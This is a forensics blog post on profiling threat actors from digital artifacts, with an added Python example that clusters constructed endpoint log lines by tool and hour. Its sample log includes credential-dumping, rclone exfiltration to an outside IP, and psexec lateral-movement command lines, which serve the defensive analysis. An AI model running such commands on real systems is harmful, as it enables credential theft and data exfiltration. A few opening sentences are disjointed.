I've always been a fan of books or shows where someone follows clues and develops an overall picture that leads them to their end goal.
The main web page even includes a brief history of behavioral profiling.
Apparently it is, as there's research to suggest that this is the case.
Further, Google lists a number of resources dedicated to cyber behavioral profiling.
I ask the question because this is something I've looked at for some time now, not only to develop a better understanding of targeted threat actors who are still active during incident response, but also to distinguish a threat actor's actions during the response from those of others involved.
By going beyond just individual data points and looking at the multifaceted, nuanced nature of those artifacts, we can begin to discern patterns that inform us about the intent, sophistication, and situational awareness of the threat actor.
To that end, Joe Slowik has correctly stated that there's a need in CTI to view indicators as composite objects: things like hashes and IP addresses have greater value when other aspects of their nature are understood.
Many times we tend to view IP addresses one-dimensionally; however, there's so much more about those indicators that can provide insight to the threat actor behind them, such as when, how, and in what context that IP address was used.
Here's an example of an IP address; in this case, 185.56.83.82.
We can get some insight on this IP address from VirusTotal, enough to know that we should probably pay attention.
If you read the blog post, you'll see that this IP address was used as the target for data exfiltration.
The point of all this is that there's more to the data available to us than the one-dimensional perspective through which we're used to viewing it.
Now, if we begin to incorporate other data sources that are available to us, we'll begin to see exactly how, as Cameron stated, human behavior renders in digital forensics.
Some of the things I've pursued and been successful in demonstrating during previous engagements include hours of operation and preferred TTPs and approaches, enough so to separate the actions of two different threat actors on a single endpoint.
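To make the two ideas above concrete, the "when, how and in what context" view of an IP indicator and the use of hours of operation and tool preferences to separate two actors sharing one endpoint, here is an added example. It is not code from the original post; the endpoint log lines are constructed for the example, the pipe-delimited line format and the tool-to-role lists are assumptions, and the actor-clustering rule (merge activity windows that share a tool) is a deliberately simple heuristic, not a method the post describes.

```python
"""Profile an IP indicator as a composite object and derive hours of operation.

Added example; not from the original post. Log lines below are constructed.
Line format (an assumption): ISO-8601 UTC timestamp|host|user|command line|dest IP
"""
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional


@dataclass(frozen=True)
class Event:
    ts: datetime            # always UTC
    host: str
    user: str
    cmdline: str
    dst_ip: Optional[str]   # None when the command made no outbound connection


# Constructed endpoint timeline: one shared account, two distinct patterns of activity.
SAMPLE_LOG = [
    "2023-11-13T02:14:10Z|FS01|svc_backup|7z.exe a C:\\Windows\\Temp\\f.7z C:\\Finance|",
    "2023-11-13T02:40:55Z|FS01|svc_backup|rclone.exe copy C:\\Windows\\Temp\\f.7z rem:bucket|185.56.83.82",
    "2023-11-13T14:05:02Z|FS01|svc_backup|mimikatz.exe privilege::debug sekurlsa::logonpasswords|",
    "2023-11-13T15:22:47Z|FS01|svc_backup|psexec.exe \\\\DC01 -s cmd.exe|10.0.0.5",
    "2023-11-14T03:01:19Z|FS01|svc_backup|rclone.exe copy C:\\Windows\\Temp\\g.7z rem:bucket|185.56.83.82",
    "2023-11-14T14:48:30Z|FS01|svc_backup|psexec.exe \\\\FS02 -s cmd.exe|10.0.0.7",
]

# Tool-to-role hints (assumed for the example, not an authoritative list).
EXFIL_TOOLS = {"rclone.exe", "megasync.exe", "winscp.exe"}
LATERAL_TOOLS = {"psexec.exe", "wmic.exe"}


def parse_event(line: str) -> Event:
    ts, host, user, cmd, ip = line.split("|", 4)
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return Event(when, host, user, cmd, ip or None)


def tool_of(cmdline: str) -> str:
    """Image name of the command, lower-cased, path stripped."""
    return cmdline.split()[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()


def profile_ip(events: List[Event], ip: str) -> Optional[dict]:
    """The 'when, how and in what context' view of a single IP indicator."""
    hits = sorted((e for e in events if e.dst_ip == ip), key=lambda e: e.ts)
    if not hits:
        return None
    tools = {tool_of(e.cmdline) for e in hits}
    if tools & EXFIL_TOOLS:
        role = "exfiltration target"
    elif tools & LATERAL_TOOLS:
        role = "lateral-movement target"
    else:
        role = "unclassified"
    return {
        "ip": ip,
        "first_seen": hits[0].ts.isoformat(),
        "last_seen": hits[-1].ts.isoformat(),
        "hosts": sorted({e.host for e in hits}),
        "tools": sorted(tools),
        "hours_utc": sorted({e.ts.hour for e in hits}),
        "role": role,
    }


def activity_windows(events: List[Event], max_gap_hours: int = 4) -> List[List[Event]]:
    """Split the timeline wherever consecutive events are more than max_gap_hours apart."""
    ordered = sorted(events, key=lambda e: e.ts)
    windows: List[List[Event]] = []
    current: List[Event] = []
    for e in ordered:
        if current and e.ts - current[-1].ts > timedelta(hours=max_gap_hours):
            windows.append(current)
            current = []
        current.append(e)
    if current:
        windows.append(current)
    return windows


def attribute_actors(events: List[Event]) -> List[dict]:
    """Greedily merge activity windows that share a tool; each cluster is one candidate actor
    with its own tool set and hours-of-operation histogram. A window sharing no tool with any
    earlier cluster starts a new one (first match wins; the merge is not transitive)."""
    actors: List[dict] = []
    for window in activity_windows(events):
        tools = {tool_of(e.cmdline) for e in window}
        actor = next((a for a in actors if a["tools"] & tools), None)
        if actor is None:
            actor = {"tools": set(), "hours": Counter(), "event_count": 0}
            actors.append(actor)
        actor["tools"] |= tools
        actor["hours"].update(e.ts.hour for e in window)
        actor["event_count"] += len(window)
    return actors


EVENTS = [parse_event(line) for line in SAMPLE_LOG]

if __name__ == "__main__":
    print(profile_ip(EVENTS, "185.56.83.82"))
    for i, actor in enumerate(attribute_actors(EVENTS), 1):
        print(f"actor {i}: tools={sorted(actor['tools'])} hours_utc={sorted(actor['hours'])}")
```

On the constructed timeline the same account yields two clusters: one using 7z and rclone in the 02:00 to 03:00 UTC band, the other using mimikatz and psexec in the 14:00 to 15:00 band, and the IP indicator resolves to a first-seen/last-seen range, a host list, a tool and a role rather than a bare address. In a real engagement the gap threshold and the tool lists need tuning to the environment, and the clustering should be treated as a lead to confirm against other artifacts, not as attribution on its own.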
I've also gained insight into the situational awareness of a threat actor by observing how they reacted to stimulus; during one incident, the installed EDR framework was blocking the threat actor's tools from executing on different endpoints.
The threat actor never bothered to query any of the three endpoints to determine what was blocking their attempts; rather, on one endpoint, they attempted to disable Windows Defender.
On the second endpoint, they attempted to delete a specific AV product without ever first determining whether it was installed on the endpoint; the batch file they ran to delete all aspects and variations of the product was not preceded by query commands.
When none of these succeeded in allowing them to pursue their goals, they left.
Yes, viewed through the right lens, with the right perspective, human behavior can be discerned through digital forensics.
This Cyber News was published on windowsir.blogspot.com. Publication date: Wed, 03 Jan 2024 19:43:05 +0000